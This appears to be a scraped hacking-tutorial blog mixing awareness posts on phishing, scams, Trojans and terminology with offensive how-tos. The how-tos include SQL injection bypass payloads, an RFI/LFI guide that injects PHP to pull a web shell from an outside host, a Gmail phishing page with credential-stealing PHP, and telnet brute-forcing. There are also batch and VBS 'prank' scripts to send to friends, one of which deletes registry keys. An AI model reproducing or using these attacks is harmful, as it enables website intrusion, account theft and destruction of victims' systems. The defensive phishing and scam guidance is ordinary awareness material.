What are Keyloggers Aditya Illusion rwxr-xr-x 0 01.57

Filename	What are Keyloggers
Permission	rw-r--r--
Author	Aditya Illusion
Date and Time	01.57
Label
Action

Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke.

There are two types of keystroke loggers:

1. Software based and
2. Hardware based.

Spy ware: Spector (www.spector.com)

• Spector is a spy ware and it will record everything anyone does on the internet.
• Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With spector, you will be able to see exactly what your surveillance targets have been doing online and offline.
• Spector works by taking a snapshot of whatever is on your computer screen and saves it away in a hidden location on your computer’s hard drive.

Hacking Tool: eBlaster (www.spector.com)

• eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.
• eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address.
• Within seconds of them sending or receiving an email, you will receive your own copy of that email.

Hacking Tool: (Hardware Keylogger) (www.keyghost.com)

 

 

• eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.
• eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address.
• Within seconds of them sending or receiving an email, you will receive your own copy of that email.

Hacking Tool: (Hardware Keylogger)

• The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.
• It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.

Proxy Servers and Anonymizers Aditya Illusion rwxr-xr-x 0 01.55

Filename	Proxy Servers and Anonymizers
Permission	rw-r--r--
Author	Aditya Illusion
Date and Time	01.55
Label
Action

Proxy is a network computer that can serve as an intermediate for connection with other computers. They are usually used for the following purposes:

 

• As firewall, a proxy protects the local network from outside access.
• As IP-addresses multiplexer, a proxy allows to connect a number of computers to Internet when having only one IP-address.
• Proxy servers can be used (to some extent) to anonymize web surfing.
• Specialized proxy servers can filter out unwanted content, such as ads or ‘unsuitable’ material.
• Proxy servers can afford some protection against hacking attacks.

Anonymizers

• Anonymizers are services that help make your own web surfing anonymous.
• The first anonymizer developed was Anonymizer.com, created in 1997 by Lance Cottrell.
• An anonymizer removes all the identifying information from a user’s computers while the user surfs the Internet, thereby ensuring the privacy of the user.

How to hack website using sql injection Aditya Illusion rwxr-xr-x 0 01.33

Filename	How to hack website using sql injection
Permission	rw-r--r--
Author	Aditya Illusion
Date and Time	01.33
Label
Action

what is sql injection?

SQL Injections or simply called Structured Query Language Injection is a technique that exploits the loop hole in the database layer of the application. This happens when user mistakenly or purposely(hackers) enters the special escape characters into the username password authentication form or in URL of the website. Its called the coding standard loop hole. some website owners doesn't have proper knowledge of secure coding standards and that results into the vulnerable websites. Now assume , you opened a website and went to his Sign in or log in page. Now in username field you have entered something say yogesh and in the password box you pass some escape characters like ',",1=1, etc... Now if the website owner hasn't handled null character strings or escape characters then user will surely get something else that owner never want their users to view.. This is basically called Blind SQL. 

Some basic requirements for sql injection:
1) you need a web browser to open URL and to view source codes.
2) you need notepad++.
3) and very basic  queries of sql like insert , select , update , delete etc.

First of all you can hack those website using SQL injection hacks that allows some input fields from the visitor which can provide input to website like log in page , search page, feedback page etc.
Now a days , HTML pages use POST command to send parameter to another ASP/ASPX page.
Therefore, you may not see the parameter in the URL. You can check the source code of the HTML, and look for "FROM" tag in the HTML code. You may find something like this in some HTML codes:

<F O R M action=login.aspx method=post>
<I N P UT type=hidden name=user v a l u e=xyz>
< / F O R M>


Everything between the < F O R M > and < / F O R M > parameters(remove space in words) contains the crucial information and can help us to determine things in more detailed way.

There is alternate method for finding vulnerable website, the websites which have extension ASP, ASPX, JSP, CGI or PHP try to look for the URL's in which parameters are passed. Example is shown below:

http://example.com/login.asp?id=10

Now how to detect that this URL is vulnerable or not:

Start with single quote trick, take sample parameter as hi'or1=1--. Now in the above URL id is the parameter and 10 is its value. So when we pass hi'or1=1-- as parameter the URL will look like this:

http://example.com/login.asp?id=hi' or 1=1--

You can also do this with hidden field, for that you need to save the webpage and had to made changes to URL and parameters field and modify it accordingly. For example:

< F O R M action=http://example.com/login. asp method=p o s t >
< i n p u t  type=hidden name=abc value="hi' or 1=1--">
< / F O R M >

 If your luck is favoring you, you will get the login into the website without any username or password.

                                 

But why ' or 1=1-- ?
Take an asp page that will link you to another page with the following URL:

http://example.com/search.asp?category=sports

In this URL 'category' is the variable name and 'sports' is it's value.

Here this request fires following query on the database in background.

SELECT * FROM TABLE-NAME WHERE category='sports'

Where 'TABLE-NAME' is the name of table which is already present in some database.
So, this query returns all the possible entries from table 'search' which comes under the category 'sports'.

Now, assume that we change the URL into something like this:

http://example.com/search.asp?category=sports' or 1=1--

Now, our variable 'category' equals to "sports' or 1=1-- ", which fires SQL query on database something like: SELECT * FROM search WHERE category='sports' or 1=1--'
 

The query should now select everything from the 'search' table regardless if category is equal to 'sports' or not.
A double dash "--" tell MS SQL server to ignore the rest of the query, which will get rid of the last hanging single quote (').
Sometimes, it may be possible to replace double dash with single hash "#".

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

' or 'a'='a

 
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
'or''='

Beware of Common Internet Scams and Frauds Aditya Illusion rwxr-xr-x 0 01.25

Filename	Beware of Common Internet Scams and Frauds
Permission	rw-r--r--
Author	Aditya Illusion
Date and Time	01.25
Label
Action

The term Internet Scam or Internet Fraud refers to any type of fraud scheme that uses one or more online services to conduct fraudulent activities. Internet fraud can take place on computer programs such as chat rooms, e-mail, message boards, or Web sites. In this post I will discuss about some of the commonly conducted scams and frauds across the Internet.

 

1. Phishing Scam

 

This is one of the most commonly used scam to steal bank logins and other types of passwords on the Internet. Phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Phishing is typically carried out by e-mail or instant messaging.

Example:You may receive an email which claims to have come from your bank/financial institution/online service provider that asks you to click a link and update your account information. When you click such a link it will take you to a fake page which exactly resembles the original ones. Here you’ll be asked to enter your personal details such as username and password. Once you enter your personal details they will be stolen away. Such an email is more than likely the type of Internet scam known as “phishing”. Phishing is said to be highly effective and has proved to have more success rate since most of the common people fail to identify the scam.

Most legitimate companies never request any kind of personal/sensitive information via email. So it is highly recommended that you DO NOT respond to such fraudulent emails. For more information on phishing visit my detailed post What is Phishing?

 

2. Nigerian Scams

 

This type of scam involves sending emails (spam) to people in bulk seeking their help to access large amount of money that is held up in a foreign bank account. This email claims that in return for the help you’ll be rewarded a percentage of the fund that involves in the transaction. Never respond to these emails since it’s none other than a scam.

In case if you respond to these emails you will be asked to deposit a small amount of money (say 1-2% of the whole fund) as an insurance or as an advance payment for the initialization of deal. However once you deposit the amount to the scammer’s account you’ll not get any further response from them and you lose your money. In fact “The large amount of money” never exists and the whole story is a trap for innocent people who are likely to become victims. The scammers use a variety of stories to explain why they need your help to access the funds. The following are some of the examples of them.

Examples:

• They may claim that political climate or legal issues preclude them from accessing funds in a foreign bank account
• They may claim that the person is a minor and hence needs your help to access the funds
• They may claim that your last name is the same as that of the deceased person who owned the account and suggest that you act as the Next of Kin of this person in order to gain access to the funds

 

3. Lottery Scams

 

This type of scam is similar to the one discussed above. In this type you may receive an email saying that you have won a large sum of money in online lottery scheme (ex. UK Lottery) even though you have not participated in any such schemes. The message claims that your email ID was selected randomly from a lagre pool of IDs. When you respond to such emails they initially ask for your complete name and address so that they can mail the cheque accross to you. After getting those details they may also send you an image of the cheque drawn in your name and address so as to confirm the deal. But in order to mail this cheque they demand a small amount of money as insurance/shipping charge/tax in return. However if you send the amount in hope to receive the cheque all you get is nothing. You’re just trapped in a wonderful scam scheme. Thats it.

 

4. Other General Scams and Frauds

 

The following are some of the other types of scams that you should be aware of.

In general, be aware of unsolicited emails that:

1. Promise you money, jobs or prizes
2. Ask you to provide sensitive personal information
3. Ask you to follow a link to a website and log on to an account.
4. Propose lucrative business deals

However it may seem to be a difficult task for novice Internet users to identify such online scams. Here are some of the common signs of such scam emails. By knowing them it may help you to stay away.

• All these scam emails never address you by your name. In turn they commonly address you something like “Dear User” or “Dear Customer” etc. This is a clear indication that the email is a fraudulent one
• When you observe the email header you may notice in the “TO:” Field that, the same email is forwarded to a large group of people or the “TO:” field appears blank. So this confirms that the email was not intended particularly for you. It was forwarded for a large group of people and you are one among them

three ways to update a shell Aditya Illusion rwxr-xr-x 0 01.09

Filename	three ways to update a shell
Permission	rw-r--r--
Author	Aditya Illusion
Date and Time	01.09
Label
Action

3 ways to upload a shell!

Alright so I'm bored again and writing this nice tutorial for you guys.

NOTE: This tutorial is COMPLETELY written by me from my experience, therefore I won't give credit to anyone.

This tutorial contains:
-> RFI
-> LFI method 1
-> LFI method 2

First, I will start with the RFI method.

RFI or Remote File Inclusion is a technique which allows you to include a remote file(from a URL) to a webscript.

Let's say we have a website called
Code:
http://www.v1ct1mp4g31337.com/​index.php?include=register.php

Now take a look at the part after "index.php?", do you see that "include=register.php" ? This is exactly what we are looking for.

Now try to include google by typing in
Code:
http://www.v1ct1mp4g31337.com/​index.php?include=http%3A%2F%2​Fwww.google.com

Now, if it displays the google page, you are able to include remote files. If it gives an error message, jump to the LFI part of the tutorial now.

Well, let's just say it worked and it displays google. Now we are going to include a shell(you can get one here). Do this by typing this into your URL bar:
Code:
http://www.v1ct1mp4g31337.com/​index.php?include=http%3A%2F%2​Fwww.z0mgh4x0rpage.com%2Fmaste​rshell.txt

WARNING: Put your shell ALWAYS in TXT format on your website, otherwise people will be able to access it and F*** with your server!!

Alright thats it! Now your shell is included and you can rape the victims webserver.

Now we are going for LFI method 1

NOTE: You will need FireFox and its addon Tamper Data to do this method!

LFI or Local File Inclusion allows you to include a local file(which means, that the file is stored on the server) and run it in a webscript.

In this method we are going to upload a shell by accessing the proc/self/environ.

Now we have our page
Code:
http://www.v1ct1mp4g31337.com/​index.php?include=register.php

And now we are going to do this:
Code:
http://www.v1ct1mp4g31337.com/​index.php?include=..%2F

If it gives you an error message, this is good. Best thing that can happen is, it says "No such file or directory". But anyways, now add this to your url:
Code:
http://www.v1ct1mp4g31337.com/​index.php?include=..%2Fetc%2Fp​asswd

And as long as there is no text other than an error message on the page, keep adding "../" to the URL, so it would be like:
Code:
http://www.v1ct1mp4g31337.com/​index.php?include=..%2Fetc%2Fp​asswd
http://www.v1ct1mp4g31337.com/​index.php?include=..%2F..%2Fet​c%2Fpasswd
http://www.v1ct1mp4g31337.com/​index.php?include=..%2F..%2F..​%2Fetc%2Fpasswd

And so on. Now let's say we got to this URL
Code:
http://www.v1ct1mp4g31337.com/​index.php?include=..%2F..%2F..​%2Fetc%2Fpasswd

And we see some huge shitty text we can not handle with. Now change the etc/passwd in the URL to proc/self/environ so it would look like this:
Code:
http://www.v1ct1mp4g31337.com/​index.php?include=..%2F..%2F..​%2Fproc%2Fself%2Fenviron

If you see some text, you did good, if you see an error message you did bad. Now this is the point where we use Tamper Data. Start you Tamper and reload the page, and for user agent you type in the following PHP script:
PHP Code:
<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.z0mgh4x0rpage.com/m​astershell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>

This will execute the PHP script on the site and create a shell.php on the server. Why? Because the user agent is being displayed on the webpage, and if you put in a webscript for that, it will execute it.

Now simply access your shell by going to
Code:
http://www.v1ct1mp4g31337.com/​shell.php

And rape the server.

Now LFI method 2

NOTE: This only works on apache servers!

Alright you get back to the point where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd, you will try to get access to apache/logs/error.log

If you have a brain, you should know how to do that, since it's EXACTLY the same method as on etc/passwd (explained in LFI method 1).

Now when you have found the file, open up cmd and type in
Code:
telnet www.v1ct1mp4g31337.com 80

When you are inside the telnet, you copy the following code(you use your own shell url ofc)
PHP Code:
<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.z0mgh4x0rpage.com/m​astershell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>

Paste it into the telnet window, and press enter once or maybe twice(until you get an error message).

Now refresh the page in the browser(error.log) once and there you go. The PHP script will be executed and your shell will get uploaded to the server. Access it by typing in the following into your browser:

Code:
http://www.v1ct1mp4g31337.com/​shell.php

I hope I could help you and Thank you is always appreciated!

How to hack gmail part 2 Aditya Illusion rwxr-xr-x 0 01.08

Filename	How to hack gmail part 2
Permission	rw-r--r--
Author	Aditya Illusion
Date and Time	01.08
Label
Action

There are many ways to hack Gmail accounts and the best way to hack G mail account is phishing.
The steps are as follow

1) you need to download fake page of gmail click here to download
2) Upload that fake page in any free hosting websites like my3gb which gives you 3 GB space.
3) Upload that two files in to my3gb
4) And send the link to the victim
Whenever your victim gets login from your fake page after that One file will created
like "Gmail-Passwords.htm" in that file includes the passwords of your victim.
Then simply login in to his/her gmail account.

Collection of CMD annoying & tricky VB scripts Aditya Illusion rwxr-xr-x 0 01.07

Filename	Collection of CMD annoying & tricky VB scripts
Permission	rw-r--r--
Author	Aditya Illusion
Date and Time	01.07
Label
Action

Hello friends here i am posting some of the CMD annoying and tricky VB scripts.
Its not a virus but you can consider it as a virus.

1 Convey your friend a lil' message and shut down his / her computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

2 Toggle your friend's Caps Lock button simultaneously:
Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

3 Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

4 Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

5 Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:
Type :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

9 Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.

How to Hack Gmail Account Password Aditya Illusion rwxr-xr-x 1 01.04

Filename	How to Hack Gmail Account Password
Permission	rw-r--r--
Author	Aditya Illusion
Date and Time	01.04
Label
Action

his is one of the best mode to hack gmail  password.This will work only if your friend don’t know about this mode of hacking gmail.

For this We need three files:

1.Fake gmail login page

2.Php file

3.Text file to pile password

Start your php file

1.Open notepad and copy this code:

header (“Place: https://gmail.com”);

$handle = fopen(“password.txt”, “a”);

foreach($_POST as $wavering => $regard) {

fwrite($handle, $wavering);

fwrite($handle, “=”);

fwrite($handle, $regard);

fwrite($handle, “rn”);

}

fwrite($ handle, “rn”);

fclose($handle) ;

exit;

?>

2.Now save this as gmailphishing.php

Your php file is now made

If you Don’t know what this php file is doing you need to learn some basic of php.This php file will save information of victim in file password.txt

Start gmail fake login page

Now  go to http://www.gmail.com and aptly click / View Source.Copy source in notepad and save it as gmaillogin.html .Now open source code of this html file

We need to find the place everywhere Login  code in gmail page that everywhere send the user with clicking on it.

Now Press crtl-f with notch source code and   quest for this code

proceedings=no matter what business.

In this case we have this

proceedings=”https://www.google.com/accounts/ServiceLoginAuth?service=mail”

We replace that part with:

proceedings=”gmailphishing.php”

Save your gmailfake.html file

Text file

Start a bemused text file and name it password.txt

Now upload all the three files gmailfake.html,gmailphishing.php,Password.txt in any free web hosting site directory like 100mb.com and now you can just check your fake gmail login page by inane to http://ursite.110mb.com/gmailfake.html for the fake login page.Just type some random user name and any password into the text box and then you will see in your file manager that a file called “Password.txt” is made,In which the password is stored.

how to hack ip address? Aditya Illusion rwxr-xr-x 0 01.03

Filename	how to hack ip address?
Permission	rw-r--r--
Author	Aditya Illusion
Date and Time	01.03
Label
Action

Now follow these steps to hack ip address. 

1. Confirm the website or a computer you want to hack.
2. Find or trace their IP address.
3. Make sure that IP address is online (online is necessary)
4. Scan for open ports
5. Check for venerable ports
6. access through the port
7. Brute-force username and password

First, getting the IP address of victim.

To get the IP address of the victim website, ping for it in command prompt.

For example,

ping www.google.com

will fetch the IP address of Google.com

This is how we can get the IP address of the victims website

Now you got the IP address right? Is it online? To know the online status just ping the IP address, if it is online it will reply.
If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily.
Use Advanced Port Scanner to scan all open and venerable ports.

Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > add windows components.
Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.
telnet [IP address] [Port]

You’ll be asked to input login information.

If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools like this one.
In this way you’ll able to hack remove computer using only IP address.

free download 1000 hacking tutorials Aditya Illusion rwxr-xr-x 0 00.56

Filename	free download 1000 hacking tutorials
Permission	rw-r--r--
Author	Aditya Illusion
Date and Time	00.56
Label
Action

Now free download 1000 hacking tutorials which includes all the stuffs of hacking , cracking and tips

its most useful.

its includes the most of hacking tricks and tips , e books of hacking , Phreaking and many more tutorials are available to download.

And security , remote shutdown , cmd tricks , windows tricks . networks tricks , dos tricks and many more things are available to download.


lots of other tutorials are available.

download link
Here

facebook hack to display your message Aditya Illusion rwxr-xr-x 0 00.55

Filename	facebook hack to display your message
Permission	rw-r--r--
Author	Aditya Illusion
Date and Time	00.55
Label
Action

Now using this hack you can display a custom message on facebook and prank your friends that you have hacked this facebook page.

You can change the message and title whatever you want.

How to display your custom message and title on facebook:

1) open your browser
2) copy the bellow URL and paste in the address bar of web brower

https://www.facebook.com/connect/connect_to_node_error.php?title=MY TITLE&body=MY MESSAGE
3) Now change 'MY TITLE' with your title you want to display and 'MY MESSAGE' with your message and press enter



NOWlet my  title is cyber security and message is hacked by cyber security  then the URL will become something like this:
https://www.facebook.com/connect/connect_to_node_error.php?title=cyber security&body=hacked by cyber security
see this

enjoy and make your friends fool. 

hacking books Aditya Illusion rwxr-xr-x 0 00.54

Filename	hacking books
Permission	rw-r--r--
Author	Aditya Illusion
Date and Time	00.54
Label
Action

Here i m sharing a four books of hacking which includes the certified ethical hacking , ethical hacking , computer security , and the cyberom clients guide books are avalable to download.

click here to download collection

notepad hacking Aditya Illusion rwxr-xr-x 1 00.50

Filename	notepad hacking
Permission	rw-r--r--
Author	Aditya Illusion
Date and Time	00.50
Label
Action

Here i am posting some of the notepad hacking scripts. You can call it a virus , create it and send it your friend and make him fool.

1.  To Stupidity Shutdown Computer –>
*This pops up a funny message then will shutdown the computer*

CODE:
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10

2.  Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK] –>
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)*

CODE :
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE

3.  Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*
CODE :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

4.  Crazy caps lock
*This constantly turns caps lock on and off really fast continuously*
CODE :
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

5.  Endless Enter
*This constantly makes it so the enter button is being pressed continuesly*
CODE :
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

6.  Endless Backspace
*This makes it so the backspace key is constantly being pressed*
CODE :
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

7.  Popping CD Drives
*This will make the CD drives constantly pop out*
CODE :
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

Hope it will help you to make your friend fool.

Port Scanning Aditya Illusion rwxr-xr-x 0 00.31

Filename	Port Scanning
Permission	rw-r--r--
Author	Aditya Illusion
Date and Time	00.31
Label
Action

Port Scanning is one of the most popular techniques used by hackers to discover services that can be compromised.

• A potential target computer runs many ‘services’ that listen at ‘well-known’ ‘ports’.
• By scanning which ports are available on the victim, the hacker finds potential vulnerabilities that can be exploited.
• Scan techniques can be differentiated broadly into Vanilla, Strobe, Stealth, FTP Bounce, Fragmented Packets, Sweep and UDP Scans.

Port Scanning Techniques

 
Port Scanning Techniques can be broadly classified into:

• Open scan
• Half- open scan
• Stealth scan
• Sweeps
• Misc

Commonly used tools for port scanning

1. Tool: SuperScan 3.0

  

  

  

  

  

  

2. Tool: NMap (Network Mapper)

3. Tool: NetScan Tools Pro 2003 

4. Tool: ipEye, IPSecScan

Know More About Trojans and Backdoors Aditya Illusion rwxr-xr-x 0 00.30

Filename	Know More About Trojans and Backdoors
Permission	rw-r--r--
Author	Aditya Illusion
Date and Time	00.30
Label
Action

A Trojan horse is an unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user.

• It is a legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user.
• Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.

Working of Trojans

• Attacker gets access to the trojaned system as the system goes online
• By way of the access provided by the trojan attacker can stage attacks of different types.

Various Trojan Types

• Remote Access Trojans
• Password Sending Trojans
• Keyloggers
• Destructive
• Denial Of Service (DoS) Attack Trojans
• Proxy/Wingate Trojans
• FTP Trojans
• Software Detection Killers

Modes of Transmission

• Attachments
• Physical Access
• Browser And E-mail Software Bugs
• NetBIOS (File Sharing)
• Fake Programs
• Un-trusted Sites And Freeware Software

Backdoor Countermeasures

• Most commercial ant-virus products can automatically scan and detect backdoor programs before they can cause damage (Eg. before accessing a floppy, running exe or downloading mail)
• An inexpensive tool called Cleaner (http://www.moosoft.com/cleanet.html) can identify and eradicate 1000 types of backdoor programs and trojans.
• Educate your users not to install applications downloaded from the internet and e-mail attachments.

Common Terminologies used in Internet Security Aditya Illusion rwxr-xr-x 0 00.05

Filename	Common Terminologies used in Internet Security
Permission	rw-r--r--
Author	Aditya Illusion
Date and Time	00.05
Label
Action

If you are a newbie in Internet security, you have come to the right place. The following is information on some common terms used in Internet security. So next time you don’t have to scratch your head when someone uses these.

Firewall – is a system that acts as a barrier between your computer network and the Internet. A firewall controls the flow of information according to security policies.

Hacker – can be anyone specializing in accessing computer based systems for illegal purposes or just for the fun of it.

IP spoofing – is an attempt to access your system by pretending like another system. This is done by setting up a system with an IP address that you normally trust.

Sniffing – is the spying on electronic transmissions to access data. This mostly occurs in privately owned LAN networks connected to the web.

Trojan horse – a program pretending like useful software, while its actual strategy is to access, steal or destroy user data and access authorization. Apart from destroying information, trojans can also create a backdoor on your system for stealing confidential information.

Virus – is a program that attaches itself to a program or file. This allows it to spread across networks and cause damage to software and hardware. To operate, viruses require the execution of the attached file.

Worm - A worm is almost similar to a virus, except that it doesn’t need the execution of any executable file to get activated. It can also replicate itself as it travels across networks.

What is Phishing ? Aditya Illusion rwxr-xr-x 0 00.03

Filename	What is Phishing ?
Permission	rw-r--r--
Author	Aditya Illusion
Date and Time	00.03
Label
Action

Phishing is an attempt to criminally and fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by appearing as a trustworthy entity in an electronic communication. eBay, PayPal and other online banks are common targets.

Phishing is typically carried out by email or instant messaging and often directs users to enter details at a website, although phone contact has also been used.

Phishing is an example of social engineering techniques used to fool users. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical measures.

Recent phishing attempts have targeted the customers of banks and online payment services. Social networking sites such as Orkut are also a target of phishing.

Spoofed/Fraudulent e-mails are the most widely used tools to carry out the phishing attack. In most cases we get a fake e-mail that appears to have come from a Trusted Website . Here the hacker may request us to verify username & password by replaying to a given email address.

 

TECHNIQUES BEHIND PHISHING ATTACK

 

1. Link Manipulation

Most methods of phishing use some form of technical deception designed to make a link in an email appear to belong to some trusted organization or spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers, such as this example URL

www.micosoft.com
www.mircosoft.com
www.verify-microsoft.com
instead of www.microsoft.com

 

2. Filter Evasion

Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing emails. This is the reason Gmail or Yahoo will disable the images by default for incoming mails.

 

How does a phishing attack/scam look like?

As scam artists become more sophisticated, so do their phishing e-mail messages and pop-up windows. They often include official-looking logos from real organizations and other identifying information taken directly from legitimate Web sites. Here is an example of how the phishing scam email looks like

Example of a phishing e-mail message, including a deceptive URL address linking to a scam Web site.

To make these phishing e-mail messages look even more legitimate, the scam artists may place a link in them that appears to go to the legitimate Web site (1), but it actually takes you to a phishing site (2) or possibly a pop-up window that looks exactly like the official site.

These copycat sites are also called “spoofed” Web sites. Once you’re at one of these spoofed sites, you may send personal information to the hackers.

 

How to identify a fraudulent e-mail?

Here are a few phrases to look for if you think an e-mail message is a phishing scam.

“Verify your account.”

Legitimate sites will never ask you to send passwords, login names, Social Security numbers, or any other personal information through e-mail.

“If you don’t respond within 48 hours, your account will be closed.”

These messages convey a sense of urgency so that you’ll respond immediately without thinking.

“Dear Valued Customer.”

Phishing e-mail messages are usually sent out in bulk andoften do not contain your first or last name.

“Click the link below to gain access to your account.”

HTML-formatted messages can contain links or forms that you can fill out just as you’d fill out a form on a Web site. The links that you are urged to click may contain all or part of a real company’s name and are usually “masked,” meaning that the link you see does not take you to that address but somewhere different, usually a scam Web site.

Notice in the following example that resting the mouse pointer on the link reveals the real Web address, as shown in the box with the yellow background. The string of cryptic numbers looks nothing like the company’s Web address, which is a suspicious sign.

So the Bottom line to defend from phishing attack is

1. Never assume that an email is valid based on the sender’s email address.

2. A trusted bank/organization such as paypal will never ask you for your full name and password in a PayPal email.

3. An email from trusted organization will never contain attachments or software.

4. Clicking on a link in an email is the most insecure way to get to your account.

Password Hacking FAQ Aditya Illusion rwxr-xr-x 0 23.55

Filename	Password Hacking FAQ
Permission	rw-r--r--
Author	Aditya Illusion
Date and Time	23.55
Label
Action

Some of the password basics

 

Most accounts on a computer system usually have some method of restricting access to that account, usually in the form of a password. When accessing the system, the user has to present a valid ID to use the system, followed by a password to use the account. Most systems either do not echo the password back on the screen as it is typed, or they print an asterisk in place of the real character.

On most systems,the password is typically ran through some type of algorithm to generate a hash. The hash is usually more than just a scrambled version of the original text that made up the password, it is usually a one-way hash. The one-way hash is a string of characters that cannot be reversed into its original text. You see, most systems do not “decrypt” the stored password during authentication, they store the one-way hash. During the login process, you supply an account and password. The password is ran through an algorithm that generates a one-way hash. This hash is compared to the hash stored on the system. If they are the same, it is assumed the proper password was supplied.

Cryptographically speaking, some algorithms are better than others at generating a one-way hash. The main operating systems we are covering here — NT, Netware, and Unix — all use an algorithm that has been made publically available and has been scrutinized to some degree.

